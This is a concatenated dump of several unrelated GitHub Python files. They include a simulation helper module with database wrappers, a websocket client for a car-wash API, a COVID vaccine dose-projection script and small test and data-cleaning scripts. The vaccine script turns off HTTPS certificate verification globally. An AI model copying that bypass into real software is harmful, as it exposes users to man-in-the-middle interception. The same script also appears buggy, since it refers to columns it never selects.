Response(\"User removed from subteam\", status=200)\n","repo_name":"codersforcauses/csf","sub_path":"server/api/subteam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"70264393796","text":"import os\n\nSCRIPT_FILE_PATH = \"script.js\"\n\n\ndef render_to_js(query):\n \"\"\"\n\n :param query:\n :return:\n \"\"\"\n project_working_directory = os.getcwd()\n script_file = os.path.join(project_working_directory, SCRIPT_FILE_PATH)\n\n # Parse mongo query and add printjson() to the last query\n index = str(query).rindex('db.')\n query = query[:index] + 'printjson(' + query[index:] + ');'\n\n try:\n with open(script_file, mode='w') as scriptfile:\n scriptfile.writelines('rs.slaveOk();\\n')\n scriptfile.writelines(query)\n except Exception as e:\n print(str(e))\n","repo_name":"henryaboutshen/data-sanity","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44467011561","text":"from collections import OrderedDict\nfrom datetime import datetime\nfrom math import sqrt\nfrom numpy.random import randint\nfrom subprocess import Popen\nimport codecs\nimport inspect\nimport itertools\nimport json\nimport numpy as np\nimport os\nimport sqlite3\nimport sys\n\nclass SendMessage:# {{{\n ''' \n Useful for debuging gearman workers. In the past we had jabber here.\n '''\n\n def __init__(self,msg):\n with open(\"/tmp/aamks.log\", \"a\") as f: \n f.write(str(msg)+\"\\n\")\n# }}}\nclass Dump:# {{{\n def __init__(self,*args):\n '''debugging function, much like print but handles various types better'''\n print()\n for struct in args:\n if isinstance(struct, list):\n for i in struct:\n print(i)\n elif isinstance(struct, tuple):\n for i in struct:\n print(i)\n elif isinstance(struct, dict):\n for k, v in struct.items():\n print (str(k)+':', v)\n else:\n print(struct)\n# }}}\nclass Colors:# {{{\n def hex2rgb(self,color):\n rgb = color[1:]\n r, g, b = rgb[0:2], rgb[2:4], rgb[4:6]\n return tuple([float(int(v, 16)) / 255 for v in (r, g, b)])\n# }}}\nclass SimIterations:# {{{\n ''' \n For a given project we may run simulation 0 to 999. Then we may wish to run\n 100 simulations more and have them numbered here: from=1000 to=1099 These\n from and to numbers are unique for the project and are used as rand seeds\n in later aamks modules. Remember that range(1,4) returns 1,2,3; hence\n SELECT max(iteration)+1 \n '''\n\n def __init__(self, project, scenario_id, how_many):\n self.p=Psql()\n self.project=project\n self.scenario_id=scenario_id\n self.how_many=how_many\n\n def get(self):\n self.r=[]\n try:\n # If project already exists in simulations table (e.g. 
adding 100 simulations to existing 1000)\n _max=self.p.query(\"SELECT max(iteration)+1 FROM simulations WHERE project={} AND scenario_id={}\".format(self.project,self.scenario_id))[0][0]\n self.r.append(_max-self.how_many)\n self.r.append(_max)\n except:\n # If a new project\n self.r=[1, self.how_many+1]\n return self.r\n \n# }}}\nclass Sqlite: # {{{\n\n def __init__(self, handle, must_exist=0):\n '''\n must_exist=0: we are creating the database\n must_exist=1: Exception if there's no such file\n '''\n\n if must_exist == 1:\n assert os.path.exists(handle), \"Expected to find an existing sqlite file at: {}.\\nCWD: {}\".format(handle, os.getcwd())\n\n\n self.SQLITE = sqlite3.connect(handle)\n self.SQLITE.row_factory=self._sql_assoc\n self.sqlitedb=self.SQLITE.cursor()\n\n def _sql_assoc(self,cursor,row):\n ''' Query results returned as dicts. '''\n d = OrderedDict()\n for id, col in enumerate(cursor.description):\n d[col[0]] = row[id]\n return d\n\n def query(self,query,data=tuple()):\n ''' Query sqlite, return results as dict. '''\n self.sqlitedb.execute(query,data)\n self.SQLITE.commit()\n if query[:6] in(\"select\", \"SELECT\"):\n return self.sqlitedb.fetchall() \n\n def dict_insert(self, table, named_records):\n columns = ', '.join(named_records.keys())\n placeholders = ':'+', :'.join(named_records.keys())\n query='INSERT INTO {} ({}) VALUES ({})'.format(table, columns, placeholders)\n self.query(query, named_records)\n\n def executemany(self,query,data=tuple()):\n ''' Query sqlite, return results as dict. '''\n self.sqlitedb.executemany(query,data)\n self.SQLITE.commit()\n\n def querydd(self,query,data=tuple()):\n ''' Debug query, instead of connecting shows the exact query and params. '''\n print(query)\n print(data)\n\n def dump(self):\n print(\"dump() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n print(\"project: {}\".format(os.environ['AAMKS_PROJECT']))\n print()\n for i in self.query('SELECT * FROM aamks_geom order by floor,type_pri,global_type_id'):\n print(i)\n\n def dump_geoms(self,floor='all'):\n print(\"dump_geom() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n print(\"project: {}\".format(os.environ['AAMKS_PROJECT']))\n print()\n if floor=='all':\n print(\"f;name;x0;y0;x1;y1;z0;z1;pri;sec\")\n for i in self.query('SELECT floor,name,x0,y0,x1,y1,z0,z1,type_pri,type_sec FROM aamks_geom ORDER BY floor,type_pri,global_type_id'):\n print(\"{};{};{};{};{};{};{};{};{};{}\".format(i['floor'],i['name'],i['x0'], i['y0'], i['x1'], i['y1'], i['z0'], i['z1'], i['type_pri'], i['type_sec']))\n else:\n print(\"name;x0;y0;x1;y1;z0;z1\")\n for i in self.query('SELECT name,x0,y0,x1,y1,z0,z1 FROM aamks_geom WHERE floor=? 
ORDER BY type_pri,global_type_id', (floor,)):\n                print(\"{};{};{};{};{};{};{}\".format(i['name'],i['x0'], i['y0'], i['x1'], i['y1'], i['z0'], i['z1']))\n\n    def dumpall(self):\n        ''' Remember to add all needed sqlite tables here '''\n        print(\"dump() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n        print(\"project: {}\".format(os.environ['AAMKS_PROJECT']))\n        print()\n        for i in ('aamks_geom', 'floors_meta', 'obstacles', 'partition', 'cell2compa', 'navmeshes'):\n            try:\n                print(\"\\n=======================\")\n                print(\"table:\", i)\n                print(\"=======================\\n\")\n                z=self.query(\"SELECT * FROM {}\".format(i))\n                try:\n                    z=json.loads(z[0]['json'], object_pairs_hook=OrderedDict)\n                except:\n                    pass\n                Dump(z)\n            except:\n                pass\n# }}}\nclass Psql: # {{{\n    def __init__(self):\n\n        import psycopg2\n        import psycopg2.extras\n\n        try:\n            self._project_name=os.path.basename(os.environ['AAMKS_PROJECT'])\n        except:\n            pass\n\n        try:\n            self.PSQL=psycopg2.connect(\"dbname='aamks' user='aamks' host='127.0.0.1' password='{}'\".format(os.environ['AAMKS_PG_PASS']))\n            self.psqldb=self.PSQL.cursor(cursor_factory=psycopg2.extras.DictCursor)\n        except:\n            raise SystemExit(\"Fatal: Cannot connect to postgresql.\")\n\n    def query(self,query,data=tuple()):\n        ''' Query. Return results as dict. '''\n        self.psqldb.execute(query,data)\n        self.PSQL.commit()\n        if query[:6] in(\"select\", \"SELECT\"):\n            return self.psqldb.fetchall() \n\n    def copy_expert(self, sql, csv_file):\n        cursor = self.PSQL.cursor()\n        with open(csv_file, \"w\") as f:\n            cursor.copy_expert(sql, f)\n\n    def querydd(self,query,data=tuple()):\n        ''' Debug query. Instead of connecting shows the exact query and params. '''\n        print(query)\n        print(data)\n\n    def dump(self):\n        self.json=Json()\n        self.conf=self.json.read(\"{}/conf.json\".format(os.environ['AAMKS_PROJECT']))\n        print(\"dump() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n        for i in self.query(\"SELECT id,project,iteration,to_char(current_timestamp, 'Mon.DD HH24:MI'),data FROM simulations WHERE project=%s ORDER BY id\", (self._project_name,) ):\n            print(i)\n\n# }}}\nclass Json: # {{{\n    def readdb(self,table):\n        if not hasattr(self, 's'):\n            self.s=Sqlite(\"{}/aamks.sqlite\".format(os.environ['AAMKS_PROJECT']))\n        return json.loads(self.s.query(\"SELECT json FROM {}\".format(table))[0]['json'])\n    def read(self,path): \n        try:\n            f=open(path, 'r')\n            dump=json.load(f, object_pairs_hook=OrderedDict)\n            f.close()\n            return dump\n        except:\n            raise SystemExit(\"include.py: Missing or invalid json: {}.\".format(path)) \n\n    def write(self, data, path, pretty=0): \n        try:\n            if pretty==1:\n                with open(path, \"w\") as f: \n                    json.dump(data, f, indent=4)\n            else:\n                with open(path, \"w\") as f: \n                    json.dump(data, f)\n        except:\n            raise SystemExit(\"include.py: Cannot write json: {}.\".format(path)) \n\n\n# }}}\nclass GetUserPrefs:# {{{\n    def __init__(self):# {{{\n        self.p=Psql()\n        if 'AAMKS_USER_ID' not in os.environ:\n            os.environ[\"AAMKS_USER_ID\"]=str(1)\n\n        self.pconf=json.loads(self.p.query(\"SELECT preferences FROM users WHERE id=%s\", (os.environ['AAMKS_USER_ID'],))[0][0])\n    def get_var(self, var):\n        return self.pconf[var]\n\n# }}}\n# }}}\nclass DDgeoms:# {{{\n    '''\n    dd_geoms are some optional extra rectangles, points, paths and\n    circles that are written on top of our geoms. Useful for developing\n    and debugging features. 
\n\n styles: 'fillColor', 'strokeColor', 'strokeWidth', 'opacity', 'fontSize', 'dashArray': [10,20] \n\n\n params:\n\n ddgeoms({\"type\": \"circle\" , \"g\": {\"p0\": (0, 0) , \"radius\": 10 }, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n ddgeoms({\"type\": \"rectangle\", \"g\": {\"p0\": (0, 0) , \"size\": (100, 200) }, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n ddgeoms({\"type\": \"text\" , \"g\": {\"p0\": (0, 0) , \"content\": \"Hello!\" }, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n ddgeoms({\"type\": \"path\" , \"g\": {\"p0\": (0, 0) , \"points\": [(100, 200), (200,200)]}, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n\n '''\n\n def open(self):# {{{\n self.json=Json()\n try:\n self.zz=self.json.read('{}/dd_geoms.json'.format(os.environ['AAMKS_PROJECT']))\n except:\n self.zz={}\n# }}}\n def add(self,params):# {{{\n floor=params['floor']\n tt=params['type']\n del params['floor']\n del params['type']\n if floor not in self.zz:\n self.zz[floor]={ 'rectangle': [], 'path': [], 'circle': [], 'text': [] }\n if \"p0\" in params['g']: params['g'][\"p0\"]=[ int(params['g']['p0'][0]), int(params['g']['p0'][1]) ]\n if \"p1\" in params['g']: params['g'][\"p1\"]=[ int(params['g']['p1'][0]), int(params['g']['p1'][1]) ]\n if \"points\" in params['g']: params['g'][\"points\"]=[ [int(i), int(j)] for i,j in params['g']['points'] ]\n params['g']=json.dumps(params['g'])\n self.zz[floor][tt].append(params)\n# }}}\n def write(self):# {{{\n self.json.write(self.zz, '{}/dd_geoms.json'.format(os.environ['AAMKS_PROJECT']))\n# }}}\n# }}}\nclass Vis:# {{{\n def __init__(self,params):# {{{\n ''' \n Static.json is written each time, because obstacles may be available /\n non-available, so it is not constans. \n '''\n\n self.s=Sqlite(\"{}/aamks.sqlite\".format(os.environ['AAMKS_PROJECT']))\n self.json=Json()\n self.conf=self.json.read(\"{}/conf.json\".format(os.environ['AAMKS_PROJECT']))\n self.params=params\n\n self._static_floors=OrderedDict()\n self._js_make_floors_and_meta()\n self._js_make_rooms()\n self._js_make_doors()\n self._js_make_obstacles()\n self._js_make_dd_geoms()\n self._js_make_srv_evacuees()\n self._js_vis_fire_origin()\n self._js_world_meta()\n self.json.write(OrderedDict([('world_meta', self._world_meta), ('floors', self._static_floors)]), '{}/workers/static.json'.format(os.environ['AAMKS_PROJECT'])) \n cae=CreateAnimEntry()\n cae.save(self.params, \"{}/workers/anims.json\".format(os.environ['AAMKS_PROJECT']))\n# }}}\n def _js_make_floors_and_meta(self):# {{{\n ''' Animation meta tells how to scale and translate canvas view '''\n \n for floor,meta in self.json.readdb(\"floors_meta\").items(): \n self._static_floors[floor]=OrderedDict()\n self._static_floors[floor]['floor_meta']=meta\n# }}}\n def _js_make_rooms(self):# {{{\n ''' Data for rooms. '''\n\n for floor in self._static_floors.keys():\n self._static_floors[floor]['rooms']=OrderedDict()\n for i in self.s.query(\"SELECT name,points,type_sec,room_enter FROM aamks_geom WHERE floor=? AND type_pri='COMPA'\", (floor,)):\n self._static_floors[floor]['rooms'][i['name']]=OrderedDict([ ('name', i['name']), ('type_sec', i['type_sec']), ('room_enter', i['room_enter']), ('points', i['points'])])\n# }}}\n def _js_make_doors(self):# {{{\n ''' Data for doors. '''\n\n for floor in self._static_floors.keys():\n self._static_floors[floor]['doors']=OrderedDict()\n for i in self.s.query(\"SELECT name,points,type_sec FROM aamks_geom WHERE floor=? 
AND type_tri='DOOR' AND type_sec != 'HOLE'\", (floor,)):\n self._static_floors[floor]['doors'][i['name']]=OrderedDict([ ('name', i['name']), ('type_sec', i['type_sec']), ('points', i['points'])])\n# }}}\n def _js_make_obstacles(self):# {{{\n ''' \n Data for obstacles. \n '''\n\n if \"skip_obstacles\" in self.params:\n xx={'obstacles': {} }\n dummy_obst=[[ [-1000, -1000, 0], [-1000, -1000, 0], [-1000, -1000, 0], [-1000, -1000, 0], [-1000, -1000, 0] ]]\n for floor in self._static_floors.keys():\n xx['obstacles'][floor]=dummy_obst\n else:\n xx=JSON.readdb(\"obstacles\")\n\n for floor,obstacles in xx['obstacles'].items():\n self._static_floors[floor]['obstacles']=[]\n for obstacle in obstacles:\n self._static_floors[floor]['obstacles'].append(json.dumps([ (o[0], o[1]) for o in obstacle ]))\n\n# }}}\n def _js_make_srv_evacuees(self):# {{{\n ''' Draw srv, non-animated evacuees '''\n\n if \"skip_evacuees\" in self.params:\n for floor,meta in self.json.readdb(\"floors_meta\").items(): \n self._static_floors[floor]['evacuees']=[]\n else:\n for floor,evacuees in JSON.readdb(\"dispatched_evacuees\").items():\n self._static_floors[floor]['evacuees']=[]\n for i in evacuees:\n self._static_floors[floor]['evacuees'].append(json.dumps(i))\n# }}}\n def _js_make_dd_geoms(self):# {{{\n try:\n f=self.json.read(\"{}/dd_geoms.json\".format(os.environ['AAMKS_PROJECT']))\n except:\n pass\n\n for floor in self._static_floors.keys():\n try:\n self._static_floors[floor]['dd_geoms']=f[floor]\n except:\n self._static_floors[floor]['dd_geoms']={ 'rectangle': [], 'path': [], 'circle': [], 'text': [] }\n# }}}\n def _js_vis_fire_origin(self):# {{{\n if \"skip_fire_origin\" in self.params:\n self.params['fire_origin']=None\n else:\n z=self.s.query(\"SELECT floor, x, y FROM fire_origin\")\n self.params['fire_origin']={'floor': z[0]['floor'], 'x': z[0]['x'], 'y': z[0]['y'] }\n# }}}\n def _js_world_meta(self):# {{{\n try:\n self._world_meta=JSON.readdb(\"world_meta\")['world2d']\n except:\n self._world_meta={ 'minx': 0, 'miny': 0, 'maxx': 3000, 'maxy': 2000, 'xdim': 3000, 'ydim': 2000, 'center': [1500, 100, 0] }\n# }}}\n# }}}\nclass CreateAnimEntry:# {{{\n ''' \n Animator renderer for static img | animation\n\n params for self.save()\n ======\n highlight_geom: geom to highlight in Animator\n anim: animation file | empty\n title: title\n srv: 0 | 1 (worker | server). 
1 serves the purposes:\n * previous server visuals are obsolete and need to be removed\n * initial Apainter's evacuees will be displayed\n skip_evacuees: optional; good for cfast_partition.py calls before evacuees are ready\n skip_fire_origin: optional; good for cfast_partition.py calls before fire_origin is ready\n '''\n\n def _reorder_anims(self, z):# {{{\n '''\n sort_id -1, -2, -3 come from the server.\n sort_id > 1 come from workers -- sort_id is sim_id.\n We want to display latest from the server on top, then the workers.\n The server starts with -1 and next animations have -1 added.\n '''\n\n sorted_anims=[]\n d=[]\n for i,j in enumerate(z):\n d.append((j['sort_id'],i))\n sorted_d=sorted(d)\n for i in sorted_d:\n sorted_anims.append(z[i[1]])\n lowest_id=sorted_d[0][0]\n return (sorted_anims, lowest_id - 1)\n\n# }}}\n def save(self, params, path_anims_json):# {{{\n\n self.json=Json()\n\n try:\n z=self.json.read(path_anims_json)\n z,lowest_id=self._reorder_anims(z)\n except:\n z=[]\n lowest_id=-1\n\n anim_record=OrderedDict()\n anim_record['sort_id']=lowest_id\n #lowest_id-=1\n anim_record['title']=params['title']\n anim_record['time']=datetime.now().strftime('%H:%M')\n anim_record['fire_origin']=params['fire_origin']\n anim_record['highlight_geom']=params['highlight_geom']\n anim_record['srv']=params['srv']\n anim_record['anim']=params['anim']\n records={}\n records[anim_record['title']] = anim_record\n\n # We are removing duplicates here\n for i in z:\n # TODO: Jul.2019: perhaps this breaks worker animations. Consider r['srv'] == 1 ?\n if i['title'] not in records:\n records[i['title']]=i\n\n self.json.write(list(records.values()), path_anims_json)\n #dd(records)\n# }}}\n# }}}\n\ndd=Dump\nJSON=Json()\n","repo_name":"aamks/aamks","sub_path":"include.py","file_name":"include.py","file_ext":"py","file_size_in_byte":17650,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"13396435621","text":"from websocket import create_connection\nimport time\nimport json\nimport requests \ncarSizeSensores = '11100'\nmiSede = '1'\nws = create_connection(\"wss://iib2b26n9c.execute-api.us-east-1.amazonaws.com/test\")\nws.send('{\"action\":\"identificarme\"}')\nprint(\"Receiving connectionid\")\nresult = ws.recv()\nprint(\"Received connectionid \" + result)\nws.send('{\"action\":\"saveSedeConnection\",\"connectionId\":' + result + ',\"sedeId\":\"' + miSede + '\"}')\nobtained = ws.recv()\nprint(\"connectionId saved \" + obtained)\nwhile True:\n\tinstruccion = ws.recv()\n\tprint(\"instrucciones \" + instruccion)\n\tjsonData = json.loads(instruccion)\n\tjsonToSend = json.dumps({\n\t \"carSizeBin\": carSizeSensores,\n\t \"user\": jsonData[\"userId\"],\n\t \"paymentMethod\": jsonData[\"metodoPago\"],\n\t \"scannedCode\": jsonData[\"codigoLeido\"],\n\t \"sede\": miSede\n\t})\n\tURL = 'https://flgjlel78g.execute-api.us-east-1.amazonaws.com/test/lavar'\n\tprint(URL)\n\tr = requests.post(url = URL, data = jsonToSend)\n\tprint('getting response')\n\tprint(r.text)\n","repo_name":"EzioAARM/arqui2-carwash-api","sub_path":"raspberry-test.py","file_name":"raspberry-test.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73827646274","text":"class Tank:\n def __init__(self, name, ammo) -> None:\n self.name = name\n self.ammo = ammo\n\nfirst_tank = Tank('Serie1', 3)\nprint(first_tank.name)\n\nsecond_tank = Tank('Serie2', 
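# Hedged usage sketch for Sqlite.dict_insert from include.py above, using an
# in-memory database and an invented "points" table (not an aamks table).
# sqlite3 matches the :x0/:y0 named placeholders against the dict keys, which
# is exactly what dict_insert relies on.
import sqlite3
db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE points (x0 INTEGER, y0 INTEGER)')
record = {'x0': 10, 'y0': 20}
columns = ', '.join(record.keys())
placeholders = ':' + ', :'.join(record.keys())
db.execute('INSERT INTO points ({}) VALUES ({})'.format(columns, placeholders), record)
print(db.execute('SELECT * FROM points').fetchall())  # [(10, 20)]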
5)\nprint(second_tank.name)","repo_name":"jettaponB/Practice","sub_path":"Test13.py","file_name":"Test13.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"2822554099","text":"def domainType(domains):\n    answer = []\n    for i,v in enumerate(domains):\n        val = list(v.split('.'))[-1]\n        if val == 'org':\n            answer.append(\"organization\")\n        elif val == 'info':\n            answer.append(\"information\")\n        elif val == 'net':\n            answer.append(\"network\")\n        else:\n            answer.append(\"commercial\")\n    return answer\n\n\ndomains = [\"en.wiki.org\", \"codesignal.com\", \"happy.net\", \"code.info\"]\nprint(domainType(domains))","repo_name":"akashgkrishnan/learningPython","sub_path":"domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"9946604707","text":"#%%\nimport pandas as pd\nimport requests\nimport os\nimport ssl\nfrom modules.yachtCharter import yachtCharter\nimport numpy as np\nimport datetime\nimport pytz\n\n\n#%%\n# fixes ssl error on OSX???\n\nif (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):\n    ssl._create_default_https_context = ssl._create_unverified_context\n\npops = {'NT':246.5* 1000, 'NSW':8166.4* 1000,\n'VIC':6680.6* 1000, 'QLD':5184.8* 1000,\n'ACT':431.2* 1000, 'SA':1770.6* 1000,\n 'WA':2667.1* 1000, 'TAS':541.1* 1000}\n\n# source: https://www.abs.gov.au/statistics/people/population/national-state-and-territory-population/sep-2020\n\n# 16+ population counts:\n\nsixteen_pop = {\n    'NT':190571, 'NSW':6565651, 'VIC':5407574,\n    'QLD':4112707, 'ACT':344037,\n    'SA':1440400, 'WA':2114978, 'TAS':440172, \"AUS\":20619959}\n\n# source: https://www.health.gov.au/sites/default/files/documents/2021/07/covid-19-vaccine-rollout-update-5-july-2021.pdf\n\ndata = pd.read_json('https://covidlive.com.au/covid-live.json')\ncols = list(data.columns)\n# short_cols =\t ['DATE_AS_AT','STATE','AIR_RESIDENCE_FIRST_DOSE_PCT','AIR_RESIDENCE_SECOND_DOSE_PCT','AIR_RESIDENCE_FIRST_DOSE_COUNT','AIR_RESIDENCE_SECOND_DOSE_COUNT']\n\nshort_cols = ['REPORT_DATE','CODE','VACC_DOSE_CNT','VACC_FIRST_DOSE_CNT']\n\n#%%\n\n# 'AIR_RESIDENCE_FIRST_DOSE_APPROX_COUNT',\n# 'AIR_RESIDENCE_SECOND_DOSE_APPROX_COUNT', 'ABS_ERP_JUN_2020_POP',\n# 'VALIDATED', 'URL', 'AIR_RESIDENCE_FIRST_DOSE_APPROX_COUNT',\n# 'AIR_RESIDENCE_SECOND_DOSE_COUNT'\n\n# Time between doses AZ 4 to 8 weeks, Pfizer 3 to 6 weeks\n# https://www.health.gov.au/initiatives-and-programs/covid-19-vaccines/getting-vaccinated-for-covid-19/covid-19-vaccine-information-for-people-in-greater-sydney\n\nvax_assumptions = requests.get(\"https://interactive.guim.co.uk/docsdata/14PY-eDz_KYTgeyVVBFUDu9muZ2s2JnJ6zMoLa3U1B7I.json\").json()['sheets']['data']\n\nvax_assump_df = pd.DataFrame(vax_assumptions)\n# cols = vax_assump_df.columns\nvax_assump_df = vax_assump_df.apply(pd.to_numeric, errors=\"ignore\")\nvax_assump_df['pfizer_proportion'] = vax_assump_df['pfizer_total'] / (vax_assump_df['pfizer_total'] + vax_assump_df['az_total'])\nvax_assump_df['az_proportion'] = vax_assump_df['az_total'] / (vax_assump_df['pfizer_total'] + vax_assump_df['az_total'])\n\n#%%\n\n# variables set up for state projections\n\ndate_index = pd.date_range(start='2021-07-27', end='2021-12-31')\t\n\n\nstate = \"VIC\"\nassumptions_cutoff = datetime.datetime.strptime(\"2021-09-01\", \"%Y-%m-%d\")\nend_year = datetime.datetime.strptime(\"2022-01-01\", 
\"%Y-%m-%d\")\ntemp_state = data.loc[data['CODE'] == state].copy()\ntemp_state = temp_state.loc[(temp_state[\"AGE_LOWER\"] == 16) & (temp_state['AGE_UPPER'] == 999)]\ntemp_state = temp_state[short_cols]\ntemp_state['daily_first_dose'] = temp_state['AIR_RESIDENCE_FIRST_DOSE_COUNT'].diff(1)\ntemp_state['daily_first_dose_avg'] = temp_state['daily_first_dose'].rolling(window=7).mean()\nlast_doses = temp_state['daily_first_dose_avg'].iloc[-1]\ntemp_state.index = temp_state['DATE_AS_AT']\ntemp_state = temp_state.reindex(date_index)\n# temp_state['second_dose_estimate'] = temp_state.apply(makeSecondDoses, axis=1)\n\ntemp_projections = temp_state.copy()\ntemp_projections['second_dose_pfizer_projection'] = 0\ntemp_projections['second_dose_az_projection'] = 0\n\n#%%\n\nfor index, row in temp_state[\"2021-07-28\":].iterrows():\n\t\n\tmonth = index.strftime('%B')\n\tprint(index)\n\t# check if we have actual doses to project forward, otherwise use most recent 7-day avg\n\t\n\tif pd.isnull(row['daily_first_dose']):\n\t\t# null\n\t\tdoses = last_doses\n\t\tassumptions = vax_assump_df[(vax_assump_df['month_ending'] == \"August\") & (vax_assump_df['state'] == state)]\n\telse:\n\t\tdoses = row['daily_first_dose']\n\t\tif index < assumptions_cutoff:\n\t\t\tassumptions = vax_assump_df[(vax_assump_df['month_ending'] == month) & (vax_assump_df['state'] == state)]\n\t\telse:\n\t\t\tassumptions = vax_assump_df[(vax_assump_df['month_ending'] == \"August\") & (vax_assump_df['state'] == state)]\n\t\n\t# Forward date for pfizer\n\tprint(\"doses: \", doses)\n\tdays = assumptions['pfizer_interval_upper'].iloc[0]\n\n\tpf_projection_fwd_date = index + datetime.timedelta(days=int(days))\n# \tprint(pf_projection_fwd_date)\n\tif pf_projection_fwd_date < end_year:\n\t\tprint(\"pf doses:\", doses * assumptions['pfizer_proportion'].iloc[0])\n\t\ttemp_projections.at[pf_projection_fwd_date,'second_dose_pfizer_projection'] = doses * assumptions['pfizer_proportion'].iloc[0]\n\n\t# Forward date for az\n\t\n\tdays = assumptions['az_interval_upper'].iloc[0]\n# \tprint(days)\n\tpf_projection_fwd_date = index + datetime.timedelta(days=int(days))\n# \tprint(pf_projection_fwd_date)\n\tif pf_projection_fwd_date < end_year:\n\t\t\n\t\ttemp_projections.at[pf_projection_fwd_date,'second_dose_az_projection'] = doses * assumptions['az_proportion'].iloc[0]","repo_name":"guardian/live-corona-data-vaccine-page","sub_path":"state_by_state/new_state_vax_model-covlive.py","file_name":"new_state_vax_model-covlive.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15408636254","text":"import pytest\nfrom pages.home_page import HomePage\nfrom pages.stores_page import StoresPage\n\nTEST_DATA = ['15', '25', '50', '100']\n\n\n@pytest.mark.parametrize('radius', TEST_DATA)\ndef test_search_location_error(driver, radius):\n home_page = HomePage(driver)\n home_page.open_page()\n home_page.scroll_page_to_bottom()\n home_page.click_stores_button()\n stores_page = StoresPage(driver)\n stores_page.your_location_search('Hollywood', radius)\n assert stores_page.check_error()\n","repo_name":"eugene-okulik/QAP-09onl","sub_path":"homework/vajda_maksim/homework_23/tests/test_stores_page.py","file_name":"test_stores_page.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"12265419739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 7 15:25:03 
2023\n\n@author: EvgenyGalimov\n\"\"\"\n\n\nimport pandas as pd\n\n# load the data and preprocessing the data from 5 different tabs: referrals, rebookings, emergency, surveilance, removals - so that they could be combined in 1 table\npath = 'C:/Users/EvgenyGalimov/OneDrive - Imperial College Health Partners/Documents/Docs/22_Endoscopy_forcasting_demand/Data/'\nfilename = 'Hilllingdon_Endoscopy historical data request THH.xlsx'\n\n\n# referrals\nreferrals = pd.read_excel(path+filename, sheet_name='referrals')\nreferrals2 = referrals.iloc[6:referrals.shape[0], 1:referrals.shape[1]]\nreferrals2.columns = referrals2.iloc[0]\nreferrals2 = referrals2.drop(referrals2.index[0])\nreferrals2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nreferrals2['Visit type'] = 'Referral'\n\n\n# removals\nremovals = pd.read_excel(path+filename, sheet_name='removals')\nremovals2 = removals.iloc[6:removals.shape[0], 1:removals.shape[1]]\nremovals2.columns = removals2.iloc[0]\nremovals2 = removals2.drop(removals2.index[0])\nremovals2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nremovals2['Visit type'] = 'Removal'\n\n\n# rebookings\nrebookings = pd.read_excel(path+filename, sheet_name='rebookings')\nrebookings2 = rebookings.iloc[6:rebookings.shape[0], 1:rebookings.shape[1]]\nrebookings2.columns = rebookings2.iloc[0]\nrebookings2 = rebookings2.drop(rebookings2.index[0])\nrebookings2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nrebookings2['Visit type'] = 'Rebooking'\n\n\n# emergency\nemergency = pd.read_excel(path+filename, sheet_name='emergency')\nemergency2 = emergency.iloc[6:emergency.shape[0], 1:emergency.shape[1]]\nemergency2.columns = emergency2.iloc[0]\nemergency2 = emergency2.drop(emergency2.index[0])\nemergency2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nemergency2['Visit type'] = 'Emergency'\n\n\n# surveillance\nsurveillance = pd.read_excel(path+filename, sheet_name='surveillance')\nsurveillance2 = surveillance.iloc[6:surveillance.shape[0], 1:7]\nsurveillance2.columns = surveillance2.iloc[0]\nsurveillance2 = surveillance2.drop(surveillance2.index[0])\nsurveillance2.columns = ['Date', 'Patient age', 'Hospital site',\n 'Procedure code', 'Procedure category', 'Points']\nsurveillance2['Visit type'] = 'Surveillance'\n\n\n# printing value counts\nreferrals2['Procedure category'].value_counts()\nremovals2['Procedure category'].value_counts()\nrebookings2['Procedure category'].value_counts()\nemergency2['Procedure category'].value_counts()\nsurveillance2['Procedure category'].value_counts()\n\n\n\n### COMBINING\ncombined = pd.concat([referrals2, removals2, rebookings2, emergency2, surveillance2], axis = 0)\n\n\n### setting same names for the categories named differently\n# fixing Procedure category\ncombined = combined.replace({'Procedure category': 'Flexi sigmoidoscopy'}, 'Flexible Sigmoidoscopy')\ncombined = combined.replace({'Procedure category': 'Flexi Sigmoidoscopy'}, 'Flexible Sigmoidoscopy')\ncombined = combined.replace({'Procedure category': 'NonGI'}, 'Non GI')\n# removing non GI procedures\ncombined = combined[combined['Procedure category'] != 'Non GI']\n\n\n# saving the processed dataset\ncombined.to_csv(path + '1_Hillingdon_combined.csv', index = 
